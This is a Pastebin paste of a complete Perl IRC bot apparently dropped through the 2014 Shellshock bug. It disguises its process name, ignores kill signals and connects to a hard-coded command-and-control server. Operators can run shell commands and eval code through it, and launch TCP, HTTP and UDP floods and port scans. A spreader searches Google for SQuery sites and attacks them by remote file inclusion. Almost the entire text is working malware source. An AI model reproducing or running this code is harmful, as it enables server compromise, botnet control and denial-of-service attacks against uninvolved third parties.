Advertisement
Guest User

CVE-2014-6271 payload (jur)

a guest
Sep 25th, 2014
1,917
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 16.50 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # this spreader is coded by xdh
  3. # xdh@xxxxxxxxxxx
  4. # only for testing...
  5.  
  6. my @nickname = ("|PHP|");
  7.  
  8. my $nick = $nickname[rand scalar @nickname];
  9.  
  10. my $ircname = $nickname[rand scalar @nickname];
  11.  
  12.  
  13. #system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`");
  14. my $processo = '/usr/sbin/atd';
  15.  
  16.  
  17. # funny world...
  18.  
  19. my $linas_max='6';
  20. my $sleep='5';
  21. my @adms=("JB","x");
  22. my @hostauth=("fuckoff","localhost");
  23. my @canais=("#new");
  24. chop (my $realname = 'vn');
  25. $servidor='185.31.209.84' unless $servidor;
  26. my $porta='443';
  27. my $VERSAO = 'BUCEFALO';
  28. $SIG{'INT'} = 'IGNORE';
  29. $SIG{'HUP'} = 'IGNORE';
  30. $SIG{'TERM'} = 'IGNORE';
  31. $SIG{'CHLD'} = 'IGNORE';
  32. $SIG{'PS'} = 'IGNORE';
  33. use IO::Socket;
  34. use Socket;
  35. use IO::Select;
  36. chdir("/tmp");
  37. #$servidor="$ARGV[0]" if $ARGV[0];
  38. $0="$processo"."\0"x16;;
  39. my $pid=fork;
  40. exit if $pid;
  41. die "Problema com o fork: $!" unless defined($pid);
  42.  
  43. our %irc_servers;
  44. our %DCC;
  45. my $dcc_sel = new IO::Select->new();
  46.  
  47. $sel_cliente = IO::Select->new();
  48. sub sendraw {
  49.   if ($#_ == '1') {
  50.     my $socket = $_[0];
  51.     print $socket "$_[1]\n";
  52.   } else {
  53.       print $IRC_cur_socket "$_[0]\n";
  54.   }
  55. }
  56.  
  57. sub conectar {
  58.    my $meunick = $_[0];
  59.    my $servidor_con = $_[1];
  60.    my $porta_con = $_[2];
  61.  
  62.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  63.    if (defined($IRC_socket)) {
  64.      $IRC_cur_socket = $IRC_socket;
  65.  
  66.      $IRC_socket->autoflush(1);
  67.      $sel_cliente->add($IRC_socket);
  68.  
  69.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  70.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  71.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  72.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  73.      nick("$meunick");
  74.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  75.      sendraw("PASS swedenrocks");
  76.      sleep 1;
  77.    }
  78. }
  79. my $line_temp;
  80. while( 1 ) {
  81.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  82.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  83.    my @ready = $sel_cliente->can_read(0);
  84.    next unless(@ready);
  85.    foreach $fh (@ready) {
  86.      $IRC_cur_socket = $fh;
  87.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  88.      $nread = sysread($fh, $msg, 4096);
  89.      if ($nread == 0) {
  90.         $sel_cliente->remove($fh);
  91.         $fh->close;
  92.         delete($irc_servers{$fh});
  93.      }
  94.      @lines = split (/\n/, $msg);
  95.  
  96.      for(my $c=0; $c<= $#lines; $c++) {
  97.        $line = $lines[$c];
  98.        $line=$line_temp.$line if ($line_temp);
  99.        $line_temp='';
  100.        $line =~ s/\r$//;
  101.        unless ($c == $#lines) {
  102.          parse("$line");
  103.        } else {
  104.            if ($#lines == 0) {
  105.              parse("$line");
  106.            } elsif ($lines[$c] =~ /\r$/) {
  107.                parse("$line");
  108.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  109.                parse("$line");
  110.            } else {
  111.                $line_temp = $line;
  112.            }
  113.        }
  114.       }
  115.    }
  116. }
  117.  
  118. sub parse {
  119.    my $servarg = shift;
  120.    if ($servarg =~ /^PING \:(.*)/) {
  121.      sendraw("PONG :$1");
  122.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  123.        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  124.        if ($args =~ /^\001VERSION\001$/) {
  125.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  126.        }
  127.        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  128.        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  129.          if ($onde eq "$meunick"){
  130.            shell("$pn", "$args");
  131.          }
  132.          if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
  133.             my $natrix = $1;
  134.             my $arg = $2;
  135.             if ($arg =~ /^\!(.*)/) {
  136.               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
  137.             } elsif ($arg =~ /^\@(.*)/) {
  138.                 $ondep = $onde;
  139.                 $ondep = $pn if $onde eq $meunick;
  140.                 bfunc("$ondep","$1");
  141.             } else {
  142.                 shell("$onde", "$arg");
  143.             }
  144.          }
  145.        }
  146.         }
  147.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  148.        if (lc($1) eq lc($meunick)) {
  149.          $meunick=$4;
  150.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  151.        }
  152.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  153.        nick("$meunick".int rand(9999));
  154.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  155.        $meunick = $2;
  156.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  157.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  158.        foreach my $canal (@canais) {
  159.          sendraw("JOIN $canal ddosit");
  160.        }
  161.    }
  162. }
  163.  
  164.  
  165. sub bfunc {
  166.   my $printl = $_[0];
  167.   my $funcarg = $_[1];
  168.   if (my $pid = fork) {
  169.      waitpid($pid, 0);
  170.   } else {
  171.       if (fork) {
  172.          exit;
  173.        } else {
  174.            if ($funcarg =~ /^portscan (.*)/) {
  175.              my $hostip="$1";
  176.              my
  177. @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  178.              my (@aberta, %porta_banner);
  179.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");    
  180.              foreach my $porta (@portas)  {
  181.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout
  182. => 4);
  183.                 if ($scansock) {
  184.                    push (@aberta, $porta);
  185.                    $scansock->close;
  186.                 }
  187.              }
  188.  
  189.              if (@aberta) {
  190.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
  191.              } else {
  192.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
  193.              }
  194.            }
  195.            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  196.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
  197.              my $itime = time;
  198.              my ($cur_time);
  199.              $cur_time = time - $itime;
  200.              while ($3>$cur_time){
  201.              $cur_time = time - $itime;
  202.              &tcpflooder("$1","$2","$3");
  203.              }
  204.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
  205.            }
  206.            if ($funcarg =~ /^version/) {
  207.                 sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);              
  208.                 }
  209.            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
  210.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1."
  211. seconds.");
  212.              srand;
  213.              my $itime = time;
  214.              my ($cur_time);
  215.              my ($exploited);
  216.              $boturl=$2;
  217.              $cur_time = time - $itime;$exploited = 0;
  218.                 while($1>$cur_time){
  219.                     $cur_time = time - $itime;
  220.                     @urls=fetch();
  221.                         foreach $url (@urls) {
  222.                         $cur_time = time - $itime;
  223.                         my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
  224.                         $url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
  225.                         $page = http_query($url);
  226.                         $exploited = $exploited + 1;
  227.                     }
  228.                 }
  229.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1."
  230. seconds.");
  231.            }
  232.            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
  233.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
  234.              my $itime = time;
  235.              my ($cur_time);
  236.              $cur_time = time - $itime;
  237.              while ($2>$cur_time){
  238.              $cur_time = time - $itime;
  239.              my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  240.              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  241.              close($socket);
  242.              }
  243.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
  244.            }
  245.            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  246.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for
  247. ".$3." seconds.");
  248.              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  249.              $dtime = 1 if $dtime == 0;
  250.              my %bytes;
  251.              $bytes{igmp} = $2 * $pacotes{igmp};
  252.              $bytes{icmp} = $2 * $pacotes{icmp};
  253.              $bytes{o} = $2 * $pacotes{o};
  254.              $bytes{udp} = $2 * $pacotes{udp};
  255.              $bytes{tcp} = $2 * $pacotes{tcp};
  256.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent
  257. ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
  258.            }
  259.            exit;
  260.        }
  261.   }
  262. }
  263.  
  264. sub ircase {
  265.   my ($kem, $printl, $case) = @_;
  266.  
  267.   if ($case =~ /^join (.*)/) {
  268.      j("$1");
  269.    }
  270.    if ($case =~ /^part (.*)/) {
  271.       p("$1");
  272.    }
  273.    if ($case =~ /^rejoin\s+(.*)/) {
  274.       my $chan = $1;
  275.       if ($chan =~ /^(\d+) (.*)/) {
  276.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  277.           p("$2");
  278.           j("$2");
  279.         }
  280.       } else {
  281.           p("$chan");
  282.           j("$chan");
  283.       }
  284.    }
  285.    if ($case =~ /^op/) {
  286.       op("$printl", "$kem") if $case eq "op";
  287.       my $oarg = substr($case, 3);
  288.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  289.    }
  290.    if ($case =~ /^deop/) {
  291.       deop("$printl", "$kem") if $case eq "deop";
  292.       my $oarg = substr($case, 5);
  293.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  294.    }
  295.    if ($case =~ /^msg\s+(\S+) (.*)/) {
  296.       msg("$1", "$2");
  297.    }
  298.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  299.       for (my $cf = 1; $cf <= $1; $cf++) {
  300.         msg("$2", "$3");
  301.       }
  302.    }
  303.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  304.       ctcp("$1", "$2");
  305.    }
  306.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  307.       for (my $cf = 1; $cf <= $1; $cf++) {
  308.         ctcp("$2", "$3");
  309.       }
  310.    }
  311.    if ($case =~ /^nick (.*)/) {
  312.       nick("$1");
  313.    }
  314.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  315.        conectar("$2", "$1", 6667);
  316.    }
  317.    if ($case =~ /^raw (.*)/) {
  318.       sendraw("$1");
  319.    }
  320.    if ($case =~ /^eval (.*)/) {
  321.      eval "$1";
  322.    }
  323. }
  324.  
  325. sub shell {
  326.   my $printl=$_[0];
  327.   my $comando=$_[1];
  328.   if ($comando =~ /cd (.*)/) {
  329.     chdir("$1") || msg("$printl", "No such file or directory");
  330.     return;
  331.   }
  332.   elsif ($pid = fork) {
  333.      waitpid($pid, 0);
  334.   } else {
  335.       if (fork) {
  336.          exit;
  337.        } else {
  338.            my @resp=`$comando 2>&1 3>&1`;
  339.            my $c=0;
  340.            foreach my $linha (@resp) {
  341.              $c++;
  342.              chop $linha;
  343.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  344.              if ($c == "$linas_max") {
  345.                $c=0;
  346.                sleep $sleep;
  347.              }
  348.            }
  349.            exit;
  350.        }
  351.   }
  352. }
  353.  
  354. sub tcpflooder {
  355.  my $itime = time;
  356.  my ($cur_time);
  357.  my ($ia,$pa,$proto,$j,$l,$t);
  358.  $ia=inet_aton($_[0]);
  359.  $pa=sockaddr_in($_[1],$ia);
  360.  $ftime=$_[2];
  361.  $proto=getprotobyname('tcp');
  362.  $j=0;$l=0;
  363.  $cur_time = time - $itime;
  364.  while ($l<1000){
  365.   $cur_time = time - $itime;
  366.   last if $cur_time >= $ftime;
  367.   $t="SOCK$l";
  368.   socket($t,PF_INET,SOCK_STREAM,$proto);
  369.   connect($t,$pa)||$j--;
  370.   $j++;$l++;
  371.  }
  372.  $l=0;
  373.  while ($l<1000){
  374.   $cur_time = time - $itime;
  375.   last if $cur_time >= $ftime;
  376.   $t="SOCK$l";
  377.   shutdown($t,2);
  378.   $l++;
  379.  }
  380. }
  381.  
  382. sub udpflooder {
  383.   my $iaddr = inet_aton($_[0]);
  384.   my $msg = 'A' x $_[1];
  385.   my $ftime = $_[2];
  386.   my $cp = 0;
  387.   my (%pacotes);
  388.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  389.  
  390.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  391.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  392.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  393.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  394.   return(undef) if $cp == 4;
  395.   my $itime = time;
  396.   my ($cur_time);
  397.   while ( 1 ) {
  398.      for (my $porta = 1; $porta <= 65000; $porta++) {
  399.        $cur_time = time - $itime;
  400.        last if $cur_time >= $ftime;
  401.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  402.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  403.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  404.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  405.  
  406.        for (my $pc = 3; $pc <= 255;$pc++) {
  407.          next if $pc == 6;
  408.          $cur_time = time - $itime;
  409.          last if $cur_time >= $ftime;
  410.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  411.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  412.        }
  413.      }
  414.      last if $cur_time >= $ftime;
  415.   }
  416.   return($cur_time, %pacotes);
  417. }
  418.  
  419. sub ctcp {
  420.    return unless $#_ == 1;
  421.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  422. }
  423. sub msg {
  424.    return unless $#_ == 1;
  425.    sendraw("PRIVMSG $_[0] :$_[1]");
  426. }  
  427. sub notice {
  428.    return unless $#_ == 1;
  429.    sendraw("NOTICE $_[0] :$_[1]");
  430. }
  431. sub op {
  432.    return unless $#_ == 1;
  433.    sendraw("MODE $_[0] +o $_[1]");
  434. }
  435. sub deop {
  436.    return unless $#_ == 1;
  437.    sendraw("MODE $_[0] -o $_[1]");
  438. }
  439. sub j { &join(@_); }
  440. sub join {
  441.    return unless $#_ == 0;
  442.    sendraw("JOIN $_[0]");
  443. }
  444. sub p { part(@_); }
  445. sub part {
  446.   sendraw("PART $_[0]");
  447. }
  448. sub nick {
  449.   return unless $#_ == 0;
  450.   sendraw("NICK $_[0]");
  451. }
  452. sub quit {
  453.   sendraw("QUIT :$_[0]");
  454. }
  455.  
  456. # Spreader
  457. # this 'spreader' code isnot mine, i dont know who coded it.
  458. # update: well, i just fix0red this shit a bit.
  459. #
  460.  
  461. sub fetch(){
  462.     my $rnd=(int(rand(9999)));
  463.     my $n= 80;
  464.     if ($rnd<5000) { $n<<=1;}
  465.     my $s= (int(rand(10)) * $n);
  466.  
  467. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx",
  468. "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
  469.                
  470. "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
  471.                
  472. "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
  473.                 "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
  474.                
  475. "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
  476.                
  477. "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
  478.                
  479. "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
  480.                
  481. "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",  
  482.        
  483.                
  484. "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
  485.                 "vu","vn","ye","yu","cd","zm","zw","");
  486. my @str;
  487.  
  488. foreach $dom  (@dominios)
  489. {
  490.         push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
  491. }
  492.  
  493.     my $query="www.google.com/search?q=";
  494.     $query.=$str[(rand(scalar(@str)))];
  495.     $query.="&num=$n&start=$s";
  496.     my @lst=();
  497.     my $page = http_query($query);
  498.     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  499.         if ($1 !~ m/google|cache|translate/){
  500.             push (@lst,$1);
  501.         }
  502.     }
  503.     return (@lst);
  504. }
  505.  
  506. sub http_query($){
  507.     my ($url) = @_;
  508.     my $host=$url;
  509.     my $query=$url;
  510.     my $page="";
  511.     $host =~ s/href=\"?http:\/\///;
  512.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  513.     $query =~s/$host//;
  514.     if ($query eq "") {$query="/";};
  515.     eval {
  516.         local $SIG{ALRM} = sub { die "1";};
  517.         alarm 10;
  518.         my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  519.         print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  520.         my @r = <$sock>;
  521.         $page="@r";
  522.         alarm 0;
  523.         close($sock);
  524.     };    
  525.     return $page;
  526.  
  527. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement